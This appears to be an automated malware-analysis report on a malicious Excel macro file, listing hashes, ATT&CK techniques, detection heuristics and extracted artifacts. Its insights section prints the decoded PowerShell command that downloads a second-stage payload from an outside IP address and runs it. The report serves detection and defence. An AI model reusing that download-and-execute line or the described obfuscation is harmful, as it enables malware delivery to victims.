Office (OOXML) / .XLSM malware analysis — malicious · 81dc79b21940ab4d

MALICIOUS

Office (OOXML) / .XLSM

389.8 KB Created: 2020-01-28 19:47:00 UTC Authoring application: Microsoft Excel 15.0300

MD5: cf4c3f1e0953167d484fb25ac961db42 SHA-1: d946a7e52728e50d6013a65bc0eb008b42b83787 SHA-256: 81dc79b21940ab4d94fb07cdfc337eaf3879fc4a7ad4eb71751f3c0eaa41061b

170 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is an XLSM file containing VBA macros. The Workbook_Activate subroutine constructs and executes a PowerShell command. This command is obfuscated using string concatenation and Base64 encoding, but reconstructs to: 'New-Object System.Net.WebClient).DownloadFile("http://3.64.2.251.93/vr/r/QA4ytUqTD2dtNQDS5NE5.pe", "$env:APPDATA\ProCamName") ; Start-Process -Proc "$env:APPDATA\ProCamName"'. This indicates the macro's purpose is to download and execute a second-stage payload from the specified URL. The use of PowerShell and the download/execute pattern are common for malware droppers.

Heuristics 6

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
VBA project inside OOXML medium OOXML_VBA

Document contains a VBA project — VBA macros present
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
External hyperlinks (6) low OOXML_EXTERNAL_HYPERLINKS

Document contains 6 external hyperlinks — clickable URLs are stored as external relationships. First target: https://go.microsoft.com/fwlink/?linkid=844736
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://go.microsoft.com/fwlink/?linkid=844736
- http://go.microsoft.com/fwlink/?LinkId=844969
- https://go.microsoft.com/fwlink/?linkid=844749
- https://go.microsoft.com/fwlink/?linkid=844741
- https://go.microsoft.com/fwlink/?linkid=844732
- https://go.microsoft.com/fwlink/?linkid=844725
- https://go.microsoft.com/fwlink/?linkid=844742
- https://go.microsoft.com/fwlink/?linkid=844734
- https://go.microsoft.com/fwlink/?linkid=844751
- https://go.microsoft.com/fwlink/?linkid=844745
- https://go.microsoft.com/fwlink/?linkid=844743
- https://go.microsoft.com/fwlink/?linkid=844728
- https://go.microsoft.com/fwlink/?linkid=844746
- https://go.microsoft.com/fwlink/?linkid=844747
- https://go.microsoft.com/fwlink/?linkid=844726
- https://go.microsoft.com/fwlink/?linkid=844738
- https://go.microsoft.com/fwlink/?linkid=844735
- https://go.microsoft.com/fwlink/?linkid=844750
- http://go.microsoft.com/fwlink/?LinkId=846285

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas` `2566a0284c2f239675e22fd1df36056acd4898f037a13a2bbb30a27c917ad9d2`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	5984 bytes
`vbaProject_00.bin` `ef192ac6351ac0a356278f4a3cb15640501582beb55ce831cda19c803229bfb6`	vba-project	OOXML VBA project: xl/vbaProject.bin	10752 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.